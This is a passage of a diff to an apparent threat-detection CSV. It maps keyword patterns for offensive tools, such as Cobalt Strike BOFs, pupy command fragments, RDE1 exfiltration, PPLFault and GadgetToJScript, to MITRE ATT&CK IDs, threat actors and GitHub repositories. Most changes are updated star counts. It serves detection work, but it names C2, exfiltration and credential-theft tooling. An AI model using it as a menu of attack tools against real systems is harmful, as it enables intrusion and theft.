and regex for matching server responses.","T1190 - T1191 - T1192 - T1193 - T1197","TA0002 - TA0008","N/A","N/A","Web Attacks","https://github.com/fuzzdb-project/fuzzdb","1","0","N/A","N/A","10","7641","2094","2023-02-21T15:21:06Z","2015-09-10T17:54:31Z" -"*fuzzfactory.py*","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","1","N/A","9","10","5262","1327","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z" -"*fuzzrequest.py*","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","1","N/A","9","10","5262","1327","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z" +"*fuxploider*","offensive_tool_keyword","fuxploider","Fuxploider is an open source penetration testing tool that automates the process of detecting and exploiting file upload forms flaws. This tool is able to detect the file types allowed to be uploaded and is able to detect which technique will work best to upload web shells or any malicious file on the desired web server.","T1526 - T1505 - T1506 - T1574","TA0006 - TA0008","N/A","N/A","Web Attacks","https://github.com/almandin/fuxploider","1","0","N/A","N/A","10","2668","485","2023-04-16T19:57:12Z","2017-07-14T09:30:06Z" +"*fuzz_option.pl*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*fuzzdb*","offensive_tool_keyword","fuzzdb","FuzzDB was created to increase the likelihood of finding application security vulnerabilities through dynamic application security testing. Its the first and most comprehensive open dictionary of fault injection patterns. 
predictable resource locations. and regex for matching server responses.","T1190 - T1191 - T1192 - T1193 - T1197","TA0002 - TA0008","N/A","N/A","Web Attacks","https://github.com/fuzzdb-project/fuzzdb","1","0","N/A","N/A","10","7640","2093","2023-02-21T15:21:06Z","2015-09-10T17:54:31Z" +"*fuzzfactory.py*","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","1","N/A","9","10","5263","1326","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z" +"*fuzzrequest.py*","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","1","N/A","9","10","5263","1326","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z" "*FuzzySecurity/Dendrobate*","offensive_tool_keyword","Dendrobate","Dendrobate is a framework that facilitates the development of payloads that hook unmanaged code through managed .NET code","T1055.012 - T1059.001 - T1070.004","TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/FuzzySecurity/Dendrobate","1","1","N/A","10","2","122","27","2021-11-19T12:18:50Z","2021-02-15T11:15:51Z" -"*FuzzySecurity/Sharp-Suite*","offensive_tool_keyword","Sharp-Suite","C# offensive tools","T1027 - T1059.001 - T1562.001 - T1136.001","TA0004 - TA0005 - TA0040 - TA0002","N/A","N/A","Exploitation tools","https://github.com/FuzzySecurity/Sharp-Suite","1","0","N/A","N/A","10","1069","209","2022-12-22T23:57:19Z","2018-12-10T00:08:37Z" +"*FuzzySecurity/Sharp-Suite*","offensive_tool_keyword","Sharp-Suite","C# offensive tools","T1027 - T1059.001 - T1562.001 - T1136.001","TA0004 - TA0005 - TA0040 - TA0002","N/A","N/A","Exploitation tools","https://github.com/FuzzySecurity/Sharp-Suite","1","0","N/A","N/A","10","1070","209","2022-12-22T23:57:19Z","2018-12-10T00:08:37Z" "*fw_walk disable*","offensive_tool_keyword","cobaltstrike","A 
BOF to interact with COM objects associated with the Windows software firewall.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/EspressoCake/Firewall_Walker_BOF","1","0","N/A","10","10","98","13","2021-10-10T03:28:27Z","2021-10-09T05:17:10Z" "*g_hookedSleep.*","offensive_tool_keyword","C2 related tools","An advanced in-memory evasion technique fluctuating shellcode's memory protection between RW/NoAccess & RX and then encrypting/decrypting its contents","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - 
T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/mgeeky/ShellcodeFluctuation","1","1","N/A","10","10","770","143","2022-06-17T18:07:33Z","2021-09-29T10:24:52Z" -"*g0h4n/RDE1*","offensive_tool_keyword","RDE1","RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust","T1048.003 - T1567.001 - T1020","TA0011 - TA0010 - TA0040","N/A","N/A","C2","https://github.com/g0h4n/RDE1","1","1","N/A","10","10","30","2","2023-10-02T17:47:11Z","2023-09-25T20:29:08Z" -"*g0h4n/REC2*","offensive_tool_keyword","REC2 ","REC2 (Rusty External Command and Control) is client and server tool allowing auditor to execute command from VirusTotal and Mastodon APIs written in Rust.","T1105 - T1132 - T1071.001","TA0011 - TA0009 - TA0002","N/A","N/A","C2","https://github.com/g0h4n/REC2","1","1","N/A","10","10","100","9","2023-10-01T18:29:27Z","2023-09-25T20:39:59Z" +"*g0h4n/RDE1*","offensive_tool_keyword","RDE1","RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust","T1048.003 - T1567.001 - T1020","TA0011 - TA0010 - TA0040","N/A","N/A","C2","https://github.com/g0h4n/RDE1","1","1","N/A","10","10","31","3","2023-10-02T17:47:11Z","2023-09-25T20:29:08Z" +"*g0h4n/REC2*","offensive_tool_keyword","REC2 ","REC2 (Rusty External Command and Control) is client and server tool allowing auditor to execute command from VirusTotal and Mastodon APIs written in Rust.","T1105 - T1132 - T1071.001","TA0011 - TA0009 - TA0002","N/A","N/A","C2","https://github.com/g0h4n/REC2","1","1","N/A","10","10","101","11","2023-10-01T18:29:27Z","2023-09-25T20:39:59Z" "*G0ldenGunSec/GetWebDAVStatus*","offensive_tool_keyword","cobaltstrike","Determine if the WebClient Service (WebDAV) is running on a remote system","T1548.002 - T1548.003 - T1134.001 
- T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/G0ldenGunSec/GetWebDAVStatus","1","1","N/A","10","10","81","18","2021-09-29T17:40:52Z","2021-09-29T17:31:21Z" "*g0tmi1k*","offensive_tool_keyword","Github Username","Github username hosting exploitation tools","N/A","N/A","N/A","N/A","Exploitation tools","https://github.com/g0tmi1k","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*g3tsyst3m/undertheradar*","offensive_tool_keyword","undertheradar","scripts that afford the pentester AV bypass techniques","T1055.005 - T1027 - T1116 - T1070.004","TA0040 - TA0005 - TA0009","N/A","N/A","Defense Evasion","https://github.com/g3tsyst3m/undertheradar","1","1","N/A","9","1","7","0","2023-08-10T00:30:20Z","2023-07-01T17:59:20Z" -"*gabriellandau/PPLFault*","offensive_tool_keyword","PPLFault","Exploits a TOCTOU in Windows Code Integrity to achieve arbitrary code execution as WinTcb-Light then dump a specified process.","T1055 - T1078 - T1112 - T1553 - T1555","TA0001 - TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Credential 
Access","https://github.com/gabriellandau/PPLFault","1","1","N/A","N/A","5","410","66","2023-10-03T20:00:34Z","2022-09-22T19:39:24Z" +"*gabriellandau/PPLFault*","offensive_tool_keyword","PPLFault","Exploits a TOCTOU in Windows Code Integrity to achieve arbitrary code execution as WinTcb-Light then dump a specified process.","T1055 - T1078 - T1112 - T1553 - T1555","TA0001 - TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Credential Access","https://github.com/gabriellandau/PPLFault","1","1","N/A","N/A","5","411","68","2023-10-03T20:00:34Z","2022-09-22T19:39:24Z" "*GadgetToJScript.csproj*","offensive_tool_keyword","GadgetToJScript","A tool for generating .NET serialized gadgets that can trigger .NET assembly load/execution when deserialized using BinaryFormatter from JS/VBS/VBA based scripts.","T1059.001 - T1078 - T1059.005","TA0002 - TA0004 - TA0001","N/A","N/A","Exploitation tools","https://github.com/med0x2e/GadgetToJScript","1","1","N/A","10","8","777","157","2021-07-26T17:35:40Z","2019-10-05T12:27:19Z" "*GadgetToJScript.exe -a *","offensive_tool_keyword","cobaltstrike","LiquidSnake is a tool that allows operators to perform fileless lateral movement using WMI Event Subscriptions and GadgetToJScript","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - 
APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/RiccardoAncarani/LiquidSnake","1","0","N/A","10","10","306","47","2021-09-01T11:53:30Z","2021-08-31T12:23:01Z" "*GadgetToJScript.sln*","offensive_tool_keyword","GadgetToJScript","A tool for generating .NET serialized gadgets that can trigger .NET assembly load/execution when deserialized using BinaryFormatter from JS/VBS/VBA based scripts.","T1059.001 - T1078 - T1059.005","TA0002 - TA0004 - TA0001","N/A","N/A","Exploitation tools","https://github.com/med0x2e/GadgetToJScript","1","1","N/A","10","8","777","157","2021-07-26T17:35:40Z","2019-10-05T12:27:19Z" "*GadgetToJScript-master*","offensive_tool_keyword","GadgetToJScript","A tool for generating .NET serialized gadgets that can trigger .NET assembly load/execution when deserialized using BinaryFormatter from JS/VBS/VBA based scripts.","T1059.001 - T1078 - T1059.005","TA0002 - TA0004 - TA0001","N/A","N/A","Exploitation tools","https://github.com/med0x2e/GadgetToJScript","1","1","N/A","10","8","777","157","2021-07-26T17:35:40Z","2019-10-05T12:27:19Z" "*Gality369/CS-Loader*","offensive_tool_keyword","cobaltstrike","CS anti-killing including python version and C version","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - 
T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Gality369/CS-Loader","1","1","N/A","10","10","751","149","2021-08-11T06:43:52Z","2020-08-17T21:33:06Z" -"*GateTrampolin.asm*","offensive_tool_keyword","RecycledInjector","Native Syscalls Shellcode Injector","T1055.012 - T1055.001 - T1547.002","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/florylsk/RecycledInjector","1","1","N/A","N/A","3","213","35","2023-07-02T11:04:28Z","2023-06-23T16:14:56Z" +"*GateTrampolin.asm*","offensive_tool_keyword","RecycledInjector","Native Syscalls Shellcode Injector","T1055.012 - T1055.001 - T1547.002","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/florylsk/RecycledInjector","1","1","N/A","N/A","3","214","35","2023-07-02T11:04:28Z","2023-06-23T16:14:56Z" "*gateway-finder*","offensive_tool_keyword","gateway-finder-imp","This is an improved version of original Gateway-finder. New version rebuilt with python3 and support for files with MACs/IPs The homepage of original project is: http://pentestmonkey.net/tools/gateway-finder Gateway-finder is a scapy script that will help you determine which of the systems on the local LAN has IP forwarding enabled and which can reach the Internet.","T1016 - T1049 - T1213 - T1021","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Data Exfiltration","https://github.com/whitel1st/gateway-finder-imp","1","0","N/A","N/A","1","57","7","2020-12-14T09:52:29Z","2018-04-18T12:43:11Z" "*gather/keylogger*","offensive_tool_keyword","cobaltstrike","CrossC2 developed based on the Cobalt Strike framework can be used for other cross-platform system control. 
CrossC2Kit provides some interfaces for users to call to manipulate the CrossC2 Beacon session. thereby extending the functionality of Cobalt Strike.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/CrossC2/CrossC2Kit","1","1","N/A","10","10","155","25","2023-08-08T19:52:07Z","2022-06-06T07:00:10Z" -"*gather/ldap_query*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*gather/peass.rb*","offensive_tool_keyword","PEASS","PEASS - Privilege Escalation Awesome Scripts SUITE","T1068 - T1055 - T1053 - T1059 - T1134 - T1216 - T1003 - T1187 - T1548.001 - T1548.002","TA0002 - TA0004 - TA0006 - TA0008 - TA0007 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/carlospolop/PEASS-ng","1","1","N/A","N/A","10","13375","2820","2023-10-02T22:12:50Z","2019-01-13T19:58:24Z" +"*gather/ldap_query*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*gather/peass.rb*","offensive_tool_keyword","PEASS","PEASS - Privilege Escalation Awesome Scripts SUITE","T1068 - T1055 - T1053 - T1059 - T1134 - T1216 - T1003 - T1187 - T1548.001 - T1548.002","TA0002 - TA0004 - TA0006 - TA0008 - TA0007 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/carlospolop/PEASS-ng","1","1","N/A","N/A","10","13378","2821","2023-10-04T17:36:13Z","2019-01-13T19:58:24Z" "*gather/user_hunter*","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","199","62","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" "*gatherer/gatherer.py*","offensive_tool_keyword","jackdaw","Jackdaw is here to collect all information in your domain. store it in a SQL database and show you nice graphs on how your domain objects interact with each-other an how a potential attacker may exploit these interactions. 
It also comes with a handy feature to help you in a password-cracking project by storing/looking up/reporting hashes/passowrds/users.","T1595 T1590 T1591","TA0001 - TA0002 - TA0007 - TA0008 - TA0011","N/A","N/A","Reconnaissance","https://github.com/skelsec/jackdaw","1","1","N/A","N/A","6","532","88","2023-07-19T16:21:49Z","2019-03-27T18:36:41Z" "*gato * attack*","offensive_tool_keyword","gato","GitHub Self-Hosted Runner Enumeration and Attack Tool","T1083 - T1087 - T1081","TA0006 - TA0007","N/A","N/A","Reconnaissance","https://github.com/praetorian-inc/gato","1","0","N/A","N/A","3","263","24","2023-07-27T15:15:32Z","2023-01-06T15:43:27Z" 
@@ -10512,31 +10663,31 @@ "*GCPBucketBrute*","offensive_tool_keyword","GCPBucketBrute","A script to enumerate Google Storage buckets. determine what access you have to them. and determine if they can be privilege escalated","T1083 - T1553 - T1210 - T1213","TA0001 - TA0009 - TA0011","N/A","N/A","Exploitation tools","https://github.com/RhinoSecurityLabs/GCPBucketBrute","1","0","N/A","N/A","5","406","82","2023-05-26T19:11:42Z","2019-02-26T03:56:22Z" "*GCR - Google Calendar RAT*","offensive_tool_keyword","GCR-Google-Calendar-RAT","Google Calendar RAT is a PoC of Command&Control over Google Calendar Events","T1071.001 - T1021.002 - T1059","TA0002 - TA0005","N/A","N/A","C2","https://github.com/MrSaighnal/GCR-Google-Calendar-RAT","1","1","N/A","10","10","78","15","2023-06-26T09:04:02Z","2023-06-18T13:23:31Z" "*GCR-Google-Calendar-RAT*","offensive_tool_keyword","GCR-Google-Calendar-RAT","Google Calendar RAT is a PoC of Command&Control over Google Calendar Events","T1071.001 - T1021.002 - T1059","TA0002 - TA0005","N/A","N/A","C2","https://github.com/MrSaighnal/GCR-Google-Calendar-RAT","1","1","N/A","10","10","78","15","2023-06-26T09:04:02Z","2023-06-18T13:23:31Z" -"*geacon*/cmd/*","offensive_tool_keyword","cobaltstrike","Practice Go programming and implement CobaltStrike's Beacon in Go","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - 
TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/darkr4y/geacon","1","1","N/A","10","10","1038","224","2020-10-02T10:34:37Z","2020-02-14T14:01:29Z" -"*geli2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" -"*gemailhack.py*","offensive_tool_keyword","SocialBox-Termux","SocialBox is a Bruteforce Attack Framework Facebook - Gmail - Instagram - Twitter for termux on android","T1110.001 - T1110.003 - T1078.003","TA0001 - TA0006 - TA0040","N/A","N/A","Credential Access","https://github.com/Ha3MrX/Gemail-Hack","1","1","N/A","7","9","813","385","2022-02-18T16:12:45Z","2018-04-19T13:48:41Z" -"*gen -f py bind --port*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","10","10","7841","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" -"*gen -f py_oneliner connect *","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. 
Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","10","10","7841","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" +"*geacon*/cmd/*","offensive_tool_keyword","cobaltstrike","Practice Go programming and implement CobaltStrike's Beacon in Go","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/darkr4y/geacon","1","1","N/A","10","10","1038","225","2020-10-02T10:34:37Z","2020-02-14T14:01:29Z" +"*geli2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - 
T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*gemailhack.py*","offensive_tool_keyword","SocialBox-Termux","SocialBox is a Bruteforce Attack Framework Facebook - Gmail - Instagram - Twitter for termux on android","T1110.001 - T1110.003 - T1078.003","TA0001 - TA0006 - TA0040","N/A","N/A","Credential Access","https://github.com/Ha3MrX/Gemail-Hack","1","1","N/A","7","9","815","385","2022-02-18T16:12:45Z","2018-04-19T13:48:41Z" +"*gen -f py bind --port*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" +"*gen -f py_oneliner connect *","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. 
